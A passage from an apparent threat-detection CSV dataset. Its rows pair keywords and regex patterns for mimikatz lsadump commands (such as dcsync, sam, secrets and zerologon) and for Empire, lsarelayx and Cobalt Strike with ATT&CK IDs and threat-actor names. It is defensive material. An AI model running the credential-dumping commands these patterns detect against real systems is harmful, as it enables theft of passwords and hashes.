tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51385" "*lsadump::cache*",".{0,1000}lsadump\:\:cache.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51386" "*lsadump::changentlm*",".{0,1000}lsadump\:\:changentlm.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51387" "*lsadump::dcshadow*",".{0,1000}lsadump\:\:dcshadow.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51388" "*lsadump::dcsyn*",".{0,1000}lsadump\:\:dcsync.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51389" "*lsadump::dcsync*",".{0,1000}lsadump\:\:dcsync.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 
- T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","51390" "*lsadump::dcsync*",".{0,1000}lsadump\:\:dcsync.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation 
tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51391" "*lsadump::lsa*",".{0,1000}lsadump\:\:lsa.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51392" "*lsadump::mbc*",".{0,1000}lsadump\:\:mbc.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51393" "*lsadump::netsync*",".{0,1000}lsadump\:\:netsync.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51394" "*lsadump::packages*",".{0,1000}lsadump\:\:packages.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51395" "*lsadump::postzerologon*",".{0,1000}lsadump\:\:postzerologon.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51396" "*lsadump::RpData*",".{0,1000}lsadump\:\:RpData.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51397" "*lsadump::sam*",".{0,1000}lsadump\:\:sam.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51398" "*lsadump::secrets*",".{0,1000}lsadump\:\:secrets.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51399" "*lsadump::setntlm*",".{0,1000}lsadump\:\:setntlm.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51400" "*lsadump::trust*",".{0,1000}lsadump\:\:trust.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51401" "*lsadump::zerologon*",".{0,1000}lsadump\:\:zerologon.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51402" "*lsarelayx Starting....*",".{0,1000}lsarelayx\sStarting\.\.\.\..{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","51403" "*lsarelayx.exe*",".{0,1000}lsarelayx\.exe.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential 
Access","https://github.com/CCob/lsarelayx","1","1","N/A","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","51404" "*lsarelayx_0.1_ALPHA.zip*",".{0,1000}lsarelayx_0\.1_ALPHA\.zip.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","1","N/A","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","51405" "*lsarpc_##*",".{0,1000}lsarpc_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - 